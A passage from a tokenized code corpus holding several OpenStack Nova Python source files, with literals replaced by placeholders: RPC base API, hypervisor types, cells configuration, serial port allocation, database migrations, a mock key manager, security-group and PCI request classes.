search_options , allowed_search_options ) : <EOL> """<STR_LIT>""" <EOL> if context . is_admin : <EOL> for key in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> search_options . pop ( key , None ) <EOL> return <EOL> unknown_options = [ opt for opt in search_options <EOL> if opt not in allowed_search_options ] <EOL> if unknown_options : <EOL> LOG . debug ( "<STR_LIT>" , <EOL> "<STR_LIT:U+002CU+0020>" . join ( unknown_options ) ) <EOL> for opt in unknown_options : <EOL> search_options . pop ( opt , None ) <EOL> class Servers ( extensions . V21APIExtensionBase ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> alias = ALIAS <EOL> version = <NUM_LIT:1> <EOL> def get_resources ( self ) : <EOL> member_actions = { '<STR_LIT:action>' : '<STR_LIT:POST>' } <EOL> collection_actions = { '<STR_LIT>' : '<STR_LIT:GET>' } <EOL> resources = [ <EOL> extensions . ResourceExtension ( <EOL> ALIAS , <EOL> ServersController ( extension_info = self . extension_info ) , <EOL> member_name = '<STR_LIT>' , collection_actions = collection_actions , <EOL> member_actions = member_actions ) ] <EOL> return resources <EOL> def get_controller_extensions ( self ) : <EOL> return [ ] </s>
<s> """<STR_LIT>""" <EOL> from oslo_config import cfg <EOL> import oslo_messaging as messaging <EOL> from oslo_serialization import jsonutils <EOL> from nova import rpc <EOL> CONF = cfg . CONF <EOL> rpcapi_cap_opt = cfg . StrOpt ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> CONF . register_opt ( rpcapi_cap_opt , '<STR_LIT>' ) <EOL> _NAMESPACE = '<STR_LIT>' <EOL> class BaseAPI ( object ) : <EOL> """<STR_LIT>""" <EOL> VERSION_ALIASES = { <EOL> } <EOL> def __init__ ( self , topic ) : <EOL> super ( BaseAPI , self ) . __init__ ( ) <EOL> target = messaging . Target ( topic = topic , <EOL> namespace = _NAMESPACE , <EOL> version = '<STR_LIT:1.0>' ) <EOL> version_cap = self . VERSION_ALIASES . get ( CONF . upgrade_levels . baseapi , <EOL> CONF . upgrade_levels . baseapi ) <EOL> self . client = rpc . get_client ( target , version_cap = version_cap ) <EOL> def ping ( self , context , arg , timeout = None ) : <EOL> arg_p = jsonutils . to_primitive ( arg ) <EOL> cctxt = self . client . prepare ( timeout = timeout ) <EOL> return cctxt . call ( context , '<STR_LIT>' , arg = arg_p ) <EOL> def get_backdoor_port ( self , context , host ) : <EOL> cctxt = self . client . prepare ( server = host , version = '<STR_LIT>' ) <EOL> return cctxt . call ( context , '<STR_LIT>' ) <EOL> class BaseRPCAPI ( object ) : <EOL> """<STR_LIT>""" <EOL> target = messaging . Target ( namespace = _NAMESPACE , version = '<STR_LIT>' ) <EOL> def __init__ ( self , service_name , backdoor_port ) : <EOL> self . service_name = service_name <EOL> self . backdoor_port = backdoor_port <EOL> def ping ( self , context , arg ) : <EOL> resp = { '<STR_LIT>' : self . service_name , '<STR_LIT>' : arg } <EOL> return jsonutils . to_primitive ( resp ) <EOL> def get_backdoor_port ( self , context ) : <EOL> return self . backdoor_port </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from oslo_log import log as logging <EOL> from oslo_reports import guru_meditation_report as gmr <EOL> from nova . conductor import rpcapi as conductor_rpcapi <EOL> import nova . conf <EOL> from nova import config <EOL> from nova import objects <EOL> from nova . objects import base as objects_base <EOL> from nova import service <EOL> from nova import utils <EOL> from nova import version <EOL> CONF = nova . conf . CONF <EOL> CONF . import_opt ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def main ( ) : <EOL> config . parse_args ( sys . argv ) <EOL> logging . setup ( CONF , "<STR_LIT>" ) <EOL> utils . monkey_patch ( ) <EOL> objects . register_all ( ) <EOL> gmr . TextGuruMeditation . setup_autorun ( version ) <EOL> if not CONF . conductor . use_local : <EOL> objects_base . NovaObject . indirection_api = conductor_rpcapi . ConductorAPI ( ) <EOL> should_use_ssl = '<STR_LIT>' in CONF . enabled_ssl_apis <EOL> server = service . WSGIService ( '<STR_LIT>' , use_ssl = should_use_ssl ) <EOL> service . serve ( server , workers = server . workers ) <EOL> service . wait ( ) </s>
<s> """<STR_LIT>""" <EOL> from nova import exception <EOL> BAREMETAL = "<STR_LIT>" <EOL> BHYVE = "<STR_LIT>" <EOL> DOCKER = "<STR_LIT>" <EOL> FAKE = "<STR_LIT>" <EOL> HYPERV = "<STR_LIT>" <EOL> IRONIC = "<STR_LIT>" <EOL> KQEMU = "<STR_LIT>" <EOL> KVM = "<STR_LIT>" <EOL> LXC = "<STR_LIT>" <EOL> LXD = "<STR_LIT>" <EOL> OPENVZ = "<STR_LIT>" <EOL> PARALLELS = "<STR_LIT>" <EOL> VIRTUOZZO = "<STR_LIT>" <EOL> PHYP = "<STR_LIT>" <EOL> QEMU = "<STR_LIT>" <EOL> TEST = "<STR_LIT:test>" <EOL> UML = "<STR_LIT>" <EOL> VBOX = "<STR_LIT>" <EOL> VMWARE = "<STR_LIT>" <EOL> XEN = "<STR_LIT>" <EOL> ZVM = "<STR_LIT>" <EOL> ALL = ( <EOL> BAREMETAL , <EOL> BHYVE , <EOL> DOCKER , <EOL> FAKE , <EOL> HYPERV , <EOL> IRONIC , <EOL> KQEMU , <EOL> KVM , <EOL> LXC , <EOL> LXD , <EOL> OPENVZ , <EOL> PARALLELS , <EOL> PHYP , <EOL> QEMU , <EOL> TEST , <EOL> UML , <EOL> VBOX , <EOL> VIRTUOZZO , <EOL> VMWARE , <EOL> XEN , <EOL> ZVM , <EOL> ) <EOL> def is_valid ( name ) : <EOL> """<STR_LIT>""" <EOL> return name in ALL <EOL> def canonicalize ( name ) : <EOL> """<STR_LIT>""" <EOL> if name is None : <EOL> return None <EOL> newname = name . lower ( ) <EOL> if newname == "<STR_LIT>" : <EOL> newname = XEN <EOL> if not is_valid ( newname ) : <EOL> raise exception . InvalidHypervisorVirtType ( hv_type = name ) <EOL> return newname </s>
<s> import itertools <EOL> from oslo_config import cfg <EOL> cells_opts = [ <EOL> cfg . BoolOpt ( '<STR_LIT>' , <EOL> default = False , <EOL> help = """<STR_LIT>""" ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = """<STR_LIT>""" ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = """<STR_LIT>""" , <EOL> deprecated_for_removal = True <EOL> ) , <EOL> cfg . StrOpt ( '<STR_LIT:name>' , <EOL> default = '<STR_LIT>' , <EOL> help = """<STR_LIT>""" ) , <EOL> cfg . ListOpt ( '<STR_LIT>' , <EOL> default = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> help = """<STR_LIT>""" ) , <EOL> cfg . IntOpt ( '<STR_LIT>' , <EOL> default = <NUM_LIT> , <EOL> help = """<STR_LIT>""" ) , <EOL> cfg . FloatOpt ( '<STR_LIT>' , <EOL> default = <NUM_LIT> , <EOL> help = """<STR_LIT>""" ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> choices = ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> help = """<STR_LIT>""" ) , <EOL> cfg . IntOpt ( "<STR_LIT>" , <EOL> default = <NUM_LIT> , <EOL> help = """<STR_LIT>""" ) , <EOL> cfg . IntOpt ( '<STR_LIT>' , <EOL> default = <NUM_LIT> , <EOL> help = """<STR_LIT>""" ) , <EOL> cfg . IntOpt ( '<STR_LIT>' , <EOL> default = <NUM_LIT:100> , <EOL> help = """<STR_LIT>""" ) , <EOL> ] <EOL> mute_weigher_opts = [ <EOL> cfg . FloatOpt ( '<STR_LIT>' , <EOL> default = - <NUM_LIT> , <EOL> help = """<STR_LIT>""" ) , <EOL> ] <EOL> ram_weigher_opts = [ <EOL> cfg . FloatOpt ( '<STR_LIT>' , <EOL> default = <NUM_LIT> , <EOL> help = """<STR_LIT>""" ) , <EOL> ] <EOL> weigher_opts = [ <EOL> cfg . FloatOpt ( '<STR_LIT>' , <EOL> default = <NUM_LIT:1.0> , <EOL> help = """<STR_LIT>""" ) , <EOL> ] <EOL> cell_manager_opts = [ <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = """<STR_LIT>""" ) , <EOL> cfg . IntOpt ( "<STR_LIT>" , <EOL> default = <NUM_LIT> , <EOL> help = """<STR_LIT>""" ) , <EOL> cfg . IntOpt ( "<STR_LIT>" , <EOL> default = <NUM_LIT:1> , <EOL> help = """<STR_LIT>""" ) <EOL> ] <EOL> cell_messaging_opts = [ <EOL> cfg . IntOpt ( '<STR_LIT>' , <EOL> default = <NUM_LIT:10> , <EOL> help = """<STR_LIT>""" ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = """<STR_LIT>""" ) <EOL> ] <EOL> cell_rpc_driver_opts = [ <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = """<STR_LIT>""" ) <EOL> ] <EOL> cell_scheduler_opts = [ <EOL> cfg . ListOpt ( '<STR_LIT>' , <EOL> default = [ '<STR_LIT>' ] , <EOL> help = """<STR_LIT>""" ) , <EOL> cfg . ListOpt ( '<STR_LIT>' , <EOL> default = [ '<STR_LIT>' ] , <EOL> help = """<STR_LIT>""" ) , <EOL> cfg . IntOpt ( '<STR_LIT>' , <EOL> default = <NUM_LIT:10> , <EOL> help = """<STR_LIT>""" ) , <EOL> cfg . IntOpt ( '<STR_LIT>' , <EOL> default = <NUM_LIT:2> , <EOL> help = """<STR_LIT>""" ) <EOL> ] <EOL> cell_state_manager_opts = [ <EOL> cfg . IntOpt ( '<STR_LIT>' , <EOL> default = <NUM_LIT> , <EOL> help = """<STR_LIT>""" ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> help = """<STR_LIT>""" ) <EOL> ] <EOL> rpcapi_cap_intercell_opt = cfg . StrOpt ( '<STR_LIT>' , <EOL> help = """<STR_LIT>""" ) <EOL> rpcapi_cap_cells_opt = cfg . StrOpt ( '<STR_LIT>' , <EOL> help = """<STR_LIT>""" ) <EOL> ALL_CELLS_OPTS = list ( itertools . chain ( <EOL> cells_opts , <EOL> mute_weigher_opts , <EOL> ram_weigher_opts , <EOL> weigher_opts , <EOL> cell_manager_opts , <EOL> cell_messaging_opts , <EOL> cell_rpc_driver_opts , <EOL> cell_scheduler_opts , <EOL> cell_state_manager_opts <EOL> ) ) <EOL> ALL_RPCAPI_CAP_OPTS = [ rpcapi_cap_intercell_opt , <EOL> rpcapi_cap_cells_opt ] <EOL> def register_opts ( conf ) : <EOL> conf . register_opts ( ALL_CELLS_OPTS , group = "<STR_LIT>" ) <EOL> conf . register_opts ( ALL_RPCAPI_CAP_OPTS , group = "<STR_LIT>" ) <EOL> def list_opts ( ) : <EOL> return { <EOL> '<STR_LIT>' : ALL_CELLS_OPTS , <EOL> '<STR_LIT>' : ALL_RPCAPI_CAP_OPTS , <EOL> } </s>
<s> """<STR_LIT>""" <EOL> import socket <EOL> from oslo_log import log as logging <EOL> import six . moves <EOL> import nova . conf <EOL> from nova import exception <EOL> from nova . i18n import _LW <EOL> from nova import utils <EOL> LOG = logging . getLogger ( __name__ ) <EOL> ALLOCATED_PORTS = set ( ) <EOL> SERIAL_LOCK = '<STR_LIT>' <EOL> CONF = nova . conf . CONF <EOL> @ utils . synchronized ( SERIAL_LOCK ) <EOL> def acquire_port ( host ) : <EOL> """<STR_LIT>""" <EOL> start , stop = _get_port_range ( ) <EOL> for port in six . moves . range ( start , stop ) : <EOL> if ( host , port ) in ALLOCATED_PORTS : <EOL> continue <EOL> try : <EOL> _verify_port ( host , port ) <EOL> ALLOCATED_PORTS . add ( ( host , port ) ) <EOL> return port <EOL> except exception . SocketPortInUseException as e : <EOL> LOG . warning ( e . format_message ( ) ) <EOL> raise exception . SocketPortRangeExhaustedException ( host = host ) <EOL> @ utils . synchronized ( SERIAL_LOCK ) <EOL> def release_port ( host , port ) : <EOL> """<STR_LIT>""" <EOL> ALLOCATED_PORTS . discard ( ( host , port ) ) <EOL> def _get_port_range ( ) : <EOL> config_range = CONF . serial_console . port_range <EOL> try : <EOL> start , stop = map ( int , config_range . split ( '<STR_LIT::>' ) ) <EOL> if start >= stop : <EOL> raise ValueError <EOL> except ValueError : <EOL> default_port_range = nova . conf . serial_console . DEFAULT_PORT_RANGE <EOL> LOG . warning ( _LW ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> { '<STR_LIT>' : config_range , <EOL> '<STR_LIT:default>' : default_port_range } ) <EOL> start , stop = map ( int , default_port_range . split ( '<STR_LIT::>' ) ) <EOL> return start , stop <EOL> def _verify_port ( host , port ) : <EOL> s = socket . socket ( ) <EOL> try : <EOL> s . bind ( ( host , port ) ) <EOL> except socket . error as e : <EOL> raise exception . SocketPortInUseException ( <EOL> host = host , port = port , error = e ) <EOL> finally : <EOL> s . close ( ) </s>
<s> from sqlalchemy import Column <EOL> from sqlalchemy import MetaData <EOL> from sqlalchemy import Table <EOL> from sqlalchemy import Text <EOL> def upgrade ( migrate_engine ) : <EOL> meta = MetaData ( ) <EOL> meta . bind = migrate_engine <EOL> compute_nodes = Table ( '<STR_LIT>' , meta , autoload = True ) <EOL> shadow_compute_nodes = Table ( '<STR_LIT>' , meta , autoload = True ) <EOL> extra_resources = Column ( '<STR_LIT>' , Text , nullable = True ) <EOL> shadow_extra_resources = Column ( '<STR_LIT>' , Text , nullable = True ) <EOL> compute_nodes . create_column ( extra_resources ) <EOL> shadow_compute_nodes . create_column ( shadow_extra_resources ) </s>
<s> from oslo_log import log as logging <EOL> from sqlalchemy import MetaData , Table , Index <EOL> from nova . i18n import _LI <EOL> LOG = logging . getLogger ( __name__ ) <EOL> def upgrade ( migrate_engine ) : <EOL> """<STR_LIT>""" <EOL> meta = MetaData ( bind = migrate_engine ) <EOL> instances = Table ( '<STR_LIT>' , meta , autoload = True ) <EOL> for index in instances . indexes : <EOL> if [ c . name for c in index . columns ] == [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> LOG . info ( _LI ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> break <EOL> else : <EOL> index = Index ( '<STR_LIT>' , <EOL> instances . c . project_id , instances . c . deleted ) <EOL> index . create ( ) <EOL> for index in instances . indexes : <EOL> if [ c . name for c in index . columns ] == [ '<STR_LIT>' ] : <EOL> index . drop ( ) </s>
<s> from oslo_log import log as logging <EOL> from sqlalchemy import MetaData , Table , Index <EOL> from nova . i18n import _LI <EOL> LOG = logging . getLogger ( __name__ ) <EOL> INDEX_COLUMNS = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> INDEX_NAME = '<STR_LIT>' <EOL> def _get_table_index ( migrate_engine ) : <EOL> meta = MetaData ( ) <EOL> meta . bind = migrate_engine <EOL> table = Table ( '<STR_LIT>' , meta , autoload = True ) <EOL> for idx in table . indexes : <EOL> if idx . columns . keys ( ) == INDEX_COLUMNS : <EOL> break <EOL> else : <EOL> idx = None <EOL> return meta , table , idx <EOL> def upgrade ( migrate_engine ) : <EOL> meta , table , index = _get_table_index ( migrate_engine ) <EOL> if index : <EOL> LOG . info ( _LI ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , INDEX_NAME ) <EOL> return <EOL> columns = [ getattr ( table . c , col_name ) for col_name in INDEX_COLUMNS ] <EOL> index = Index ( INDEX_NAME , * columns ) <EOL> index . create ( migrate_engine ) </s>
<s> """<STR_LIT>""" <EOL> import array <EOL> from oslo_log import log as logging <EOL> from oslo_utils import uuidutils <EOL> from nova import exception <EOL> from nova . i18n import _LW <EOL> from nova . keymgr import key <EOL> from nova . keymgr import key_mgr <EOL> from nova import utils <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class MockKeyManager ( key_mgr . KeyManager ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> LOG . warning ( _LW ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> self . keys = { } <EOL> def _generate_hex_key ( self , ** kwargs ) : <EOL> key_length = kwargs . get ( '<STR_LIT>' , <NUM_LIT> ) <EOL> hex_encoded = utils . generate_password ( length = key_length / <NUM_LIT:4> , <EOL> symbolgroups = '<STR_LIT>' ) <EOL> return hex_encoded <EOL> def _generate_key ( self , ** kwargs ) : <EOL> _hex = self . _generate_hex_key ( ** kwargs ) <EOL> return key . SymmetricKey ( '<STR_LIT>' , <EOL> array . array ( '<STR_LIT:B>' , _hex . decode ( '<STR_LIT>' ) ) . tolist ( ) ) <EOL> def create_key ( self , ctxt , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if ctxt is None : <EOL> raise exception . Forbidden ( ) <EOL> key = self . _generate_key ( ** kwargs ) <EOL> return self . store_key ( ctxt , key ) <EOL> def _generate_key_id ( self ) : <EOL> key_id = uuidutils . generate_uuid ( ) <EOL> while key_id in self . keys : <EOL> key_id = uuidutils . generate_uuid ( ) <EOL> return key_id <EOL> def store_key ( self , ctxt , key , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if ctxt is None : <EOL> raise exception . Forbidden ( ) <EOL> key_id = self . _generate_key_id ( ) <EOL> self . keys [ key_id ] = key <EOL> return key_id <EOL> def copy_key ( self , ctxt , key_id , ** kwargs ) : <EOL> if ctxt is None : <EOL> raise exception . Forbidden ( ) <EOL> copied_key_id = self . _generate_key_id ( ) <EOL> self . keys [ copied_key_id ] = self . keys [ key_id ] <EOL> return copied_key_id <EOL> def get_key ( self , ctxt , key_id , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if ctxt is None : <EOL> raise exception . Forbidden ( ) <EOL> return self . keys [ key_id ] <EOL> def delete_key ( self , ctxt , key_id , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if ctxt is None : <EOL> raise exception . Forbidden ( ) <EOL> del self . keys [ key_id ] </s>
<s> import urllib <EOL> from nova import exception <EOL> from nova . i18n import _ <EOL> from nova import utils <EOL> class SecurityGroupBase ( object ) : <EOL> def __init__ ( self , skip_policy_check = False ) : <EOL> self . skip_policy_check = skip_policy_check <EOL> def parse_cidr ( self , cidr ) : <EOL> if cidr : <EOL> try : <EOL> cidr = urllib . unquote ( cidr ) . decode ( ) <EOL> except Exception as e : <EOL> self . raise_invalid_cidr ( cidr , e ) <EOL> if not utils . is_valid_cidr ( cidr ) : <EOL> self . raise_invalid_cidr ( cidr ) <EOL> return cidr <EOL> else : <EOL> return '<STR_LIT>' <EOL> @ staticmethod <EOL> def new_group_ingress_rule ( grantee_group_id , protocol , from_port , <EOL> to_port ) : <EOL> return SecurityGroupBase . _new_ingress_rule ( <EOL> protocol , from_port , to_port , group_id = grantee_group_id ) <EOL> @ staticmethod <EOL> def new_cidr_ingress_rule ( grantee_cidr , protocol , from_port , to_port ) : <EOL> return SecurityGroupBase . _new_ingress_rule ( <EOL> protocol , from_port , to_port , cidr = grantee_cidr ) <EOL> @ staticmethod <EOL> def _new_ingress_rule ( ip_protocol , from_port , to_port , <EOL> group_id = None , cidr = None ) : <EOL> values = { } <EOL> if group_id : <EOL> values [ '<STR_LIT>' ] = group_id <EOL> ip_proto_upper = ip_protocol . upper ( ) if ip_protocol else '<STR_LIT>' <EOL> if ( ip_proto_upper == '<STR_LIT>' and <EOL> from_port is None and to_port is None ) : <EOL> from_port = - <NUM_LIT:1> <EOL> to_port = - <NUM_LIT:1> <EOL> elif ( ip_proto_upper in [ '<STR_LIT>' , '<STR_LIT>' ] and from_port is None <EOL> and to_port is None ) : <EOL> from_port = <NUM_LIT:1> <EOL> to_port = <NUM_LIT> <EOL> elif cidr : <EOL> values [ '<STR_LIT>' ] = cidr <EOL> if ip_protocol and from_port is not None and to_port is not None : <EOL> ip_protocol = str ( ip_protocol ) <EOL> try : <EOL> from_port = int ( from_port ) <EOL> to_port = int ( to_port ) <EOL> except ValueError : <EOL> if ip_protocol . upper ( ) == '<STR_LIT>' : <EOL> raise exception . InvalidInput ( reason = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> else : <EOL> raise exception . InvalidInput ( reason = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> if ip_protocol . upper ( ) not in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise exception . InvalidIpProtocol ( protocol = ip_protocol ) <EOL> if ( ip_protocol . upper ( ) in [ '<STR_LIT>' , '<STR_LIT>' ] and <EOL> ( from_port > to_port ) ) : <EOL> raise exception . InvalidPortRange ( from_port = from_port , <EOL> to_port = to_port , msg = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if ( ip_protocol . upper ( ) in [ '<STR_LIT>' , '<STR_LIT>' ] and <EOL> ( from_port < <NUM_LIT:1> or to_port > <NUM_LIT> ) ) : <EOL> raise exception . InvalidPortRange ( from_port = from_port , <EOL> to_port = to_port , msg = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ip_protocol . upper ( ) ) <EOL> if ( ip_protocol . upper ( ) == "<STR_LIT>" and <EOL> ( from_port < - <NUM_LIT:1> or from_port > <NUM_LIT:255> or <EOL> to_port < - <NUM_LIT:1> or to_port > <NUM_LIT:255> ) ) : <EOL> raise exception . InvalidPortRange ( from_port = from_port , <EOL> to_port = to_port , msg = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> values [ '<STR_LIT>' ] = ip_protocol <EOL> values [ '<STR_LIT>' ] = from_port <EOL> values [ '<STR_LIT>' ] = to_port <EOL> else : <EOL> if cidr : <EOL> return None <EOL> return values <EOL> def create_security_group_rule ( self , context , security_group , new_rule ) : <EOL> if self . rule_exists ( security_group , new_rule ) : <EOL> msg = ( _ ( '<STR_LIT>' ) % <EOL> new_rule [ '<STR_LIT>' ] ) <EOL> self . raise_group_already_exists ( msg ) <EOL> return self . add_rules ( context , new_rule [ '<STR_LIT>' ] , <EOL> security_group [ '<STR_LIT:name>' ] , <EOL> [ new_rule ] ) [ <NUM_LIT:0> ] <EOL> def rule_exists ( self , security_group , new_rule ) : <EOL> """<STR_LIT>""" <EOL> for rule in security_group [ '<STR_LIT>' ] : <EOL> keys = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> for key in keys : <EOL> if rule . get ( key ) != new_rule . get ( key ) : <EOL> break <EOL> else : <EOL> return rule . get ( '<STR_LIT:id>' ) or True <EOL> return False <EOL> def validate_property ( self , value , property , allowed ) : <EOL> pass <EOL> def ensure_default ( self , context ) : <EOL> pass <EOL> def trigger_rules_refresh ( self , context , id ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def trigger_members_refresh ( self , context , group_ids ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def populate_security_groups ( self , security_groups ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def create_security_group ( self , context , name , description ) : <EOL> raise NotImplementedError ( ) <EOL> def update_security_group ( self , context , security_group , <EOL> name , description ) : <EOL> raise NotImplementedError ( ) <EOL> def get ( self , context , name = None , id = None , map_exception = False ) : <EOL> raise NotImplementedError ( ) <EOL> def list ( self , context , names = None , ids = None , project = None , <EOL> search_opts = None ) : <EOL> raise NotImplementedError ( ) <EOL> def destroy ( self , context , security_group ) : <EOL> raise NotImplementedError ( ) <EOL> def add_rules ( self , context , id , name , vals ) : <EOL> raise NotImplementedError ( ) <EOL> def remove_rules ( self , context , security_group , rule_ids ) : <EOL> raise NotImplementedError ( ) <EOL> def get_rule ( self , context , id ) : <EOL> raise NotImplementedError ( ) <EOL> def get_instance_security_groups ( self , context , instance , detailed = False ) : <EOL> raise NotImplementedError ( ) <EOL> def add_to_instance ( self , context , instance , security_group_name ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def remove_from_instance ( self , context , instance , security_group_name ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> @ staticmethod <EOL> def raise_invalid_property ( msg ) : <EOL> raise exception . Invalid ( msg ) <EOL> @ staticmethod <EOL> def raise_group_already_exists ( msg ) : <EOL> raise exception . Invalid ( msg ) <EOL> @ staticmethod <EOL> def raise_invalid_group ( msg ) : <EOL> raise exception . Invalid ( msg ) <EOL> @ staticmethod <EOL> def raise_invalid_cidr ( cidr , decoding_exception = None ) : <EOL> raise exception . InvalidCidr ( cidr = cidr ) <EOL> @ staticmethod <EOL> def raise_over_quota ( msg ) : <EOL> raise exception . SecurityGroupLimitExceeded ( msg ) <EOL> @ staticmethod <EOL> def raise_not_found ( msg ) : <EOL> raise exception . SecurityGroupNotFound ( msg ) </s>
<s> from oslo_serialization import jsonutils <EOL> from oslo_utils import versionutils <EOL> from nova import db <EOL> from nova . objects import base <EOL> from nova . objects import fields <EOL> @ base . NovaObjectRegistry . register <EOL> class InstancePCIRequest ( base . NovaObject , <EOL> base . NovaObjectDictCompat ) : <EOL> VERSION = '<STR_LIT>' <EOL> fields = { <EOL> '<STR_LIT:count>' : fields . IntegerField ( ) , <EOL> '<STR_LIT>' : fields . ListOfDictOfNullableStringsField ( ) , <EOL> '<STR_LIT>' : fields . StringField ( nullable = True ) , <EOL> '<STR_LIT>' : fields . BooleanField ( default = False ) , <EOL> '<STR_LIT>' : fields . UUIDField ( nullable = True ) , <EOL> } <EOL> def obj_load_attr ( self , attr ) : <EOL> setattr ( self , attr , None ) <EOL> @ property <EOL> def new ( self ) : <EOL> return self . is_new <EOL> def obj_make_compatible ( self , primitive , target_version ) : <EOL> target_version = versionutils . convert_version_to_tuple ( target_version ) <EOL> if target_version < ( <NUM_LIT:1> , <NUM_LIT:1> ) and '<STR_LIT>' in primitive : <EOL> del primitive [ '<STR_LIT>' ] <EOL> @ base . NovaObjectRegistry . register <EOL> class InstancePCIRequests ( base . NovaObject , <EOL> base . NovaObjectDictCompat ) : <EOL> VERSION = '<STR_LIT>' <EOL> fields = { <EOL> '<STR_LIT>' : fields . UUIDField ( ) , <EOL> '<STR_LIT>' : fields . ListOfObjectsField ( '<STR_LIT>' ) , <EOL> } <EOL> def obj_make_compatible ( self , primitive , target_version ) : <EOL> target_version = versionutils . convert_version_to_tuple ( target_version ) <EOL> if target_version < ( <NUM_LIT:1> , <NUM_LIT:1> ) and '<STR_LIT>' in primitive : <EOL> for index , request in enumerate ( self . requests ) : <EOL> request . obj_make_compatible ( <EOL> primitive [ '<STR_LIT>' ] [ index ] [ '<STR_LIT>' ] , '<STR_LIT:1.0>' ) <EOL> primitive [ '<STR_LIT>' ] [ index ] [ '<STR_LIT>' ] = '<STR_LIT:1.0>' <EOL> @ classmethod <EOL> def obj_from_db ( cls , context , instance_uuid , db_requests ) : <EOL> self = cls ( context = context , requests = [ ] , <EOL> instance_uuid = instance_uuid ) <EOL> if db_requests is not None : <EOL> requests = jsonutils . loads ( db_requests ) <EOL> else : <EOL> requests = [ ] <EOL> for request in requests : <EOL> request_obj = InstancePCIRequest ( <EOL> count = request [ '<STR_LIT:count>' ] , spec = request [ '<STR_LIT>' ] , <EOL> alias_name = request [ '<STR_LIT>' ] , is_new = request [ '<STR_LIT>' ] , <EOL> request_id = request [ '<STR_LIT>' ] ) <EOL> request_obj . obj_reset_changes ( ) <EOL> self . requests . append ( request_obj ) <EOL> self . obj_reset_changes ( ) <EOL> return self <EOL> @ base . remotable_classmethod <EOL> def get_by_instance_uuid ( cls , context , instance_uuid ) : <EOL> db_pci_requests = db . instance_extra_get_by_instance_uuid ( <EOL> context , instance_uuid , columns = [ '<STR_LIT>' ] ) <EOL> if db_pci_requests is not None : <EOL> db_pci_requests = db_pci_requests [ '<STR_LIT>' ] <EOL> return cls . obj_from_db ( context , instance_uuid , db_pci_requests ) <EOL> @ classmethod <EOL> def get_by_instance_uuid_and_newness ( cls , context , instance_uuid , is_new ) : <EOL> requests = cls . get_by_instance_uuid ( context , instance_uuid ) <EOL> requests . requests = [ x for x in requests . requests <EOL> if x . new == is_new ] <EOL> return requests <EOL> @ staticmethod <EOL> def _load_legacy_requests ( sysmeta_value , is_new = False ) : <EOL> if sysmeta_value is None : <EOL> return [ ] <EOL> requests = [ ] <EOL> db_requests = jsonutils . loads ( sysmeta_value ) <EOL> for db_request in db_requests : <EOL> request = InstancePCIRequest ( <EOL> count = db_request [ '<STR_LIT:count>' ] , spec = db_request [ '<STR_LIT>' ] , <EOL> alias_name = db_request [ '<STR_LIT>' ] , is_new = is_new ) <EOL> request . obj_reset_changes ( ) <EOL> requests . append ( request ) <EOL> return requests <EOL> @ classmethod <EOL> def get_by_instance ( cls , context , instance ) : <EOL> if '<STR_LIT>' in instance [ '<STR_LIT>' ] : <EOL> sysmeta = instance [ '<STR_LIT>' ] <EOL> _requests = ( <EOL> cls . _load_legacy_requests ( sysmeta [ '<STR_LIT>' ] ) + <EOL> cls . _load_legacy_requests ( sysmeta . get ( '<STR_LIT>' ) , <EOL> is_new = True ) ) <EOL> requests = cls ( instance_uuid = instance [ '<STR_LIT>' ] , requests = _requests ) <EOL> requests . obj_reset_changes ( ) <EOL> return requests <EOL> else : <EOL> return cls . get_by_instance_uuid ( context , instance [ '<STR_LIT>' ] ) <EOL> def to_json ( self ) : <EOL> blob = [ { '<STR_LIT:count>' : x . count , <EOL> '<STR_LIT>' : x . spec , <EOL> '<STR_LIT>' : x . alias_name , <EOL> '<STR_LIT>' : x . is_new , <EOL> '<STR_LIT>' : x . request_id } for x in self . requests ] <EOL> return jsonutils . dumps ( blob ) <EOL> @ classmethod <EOL> def from_request_spec_instance_props ( cls , pci_requests ) : <EOL> objs = [ InstancePCIRequest ( ** request ) <EOL> for request in pci_requests [ '<STR_LIT>' ] ] 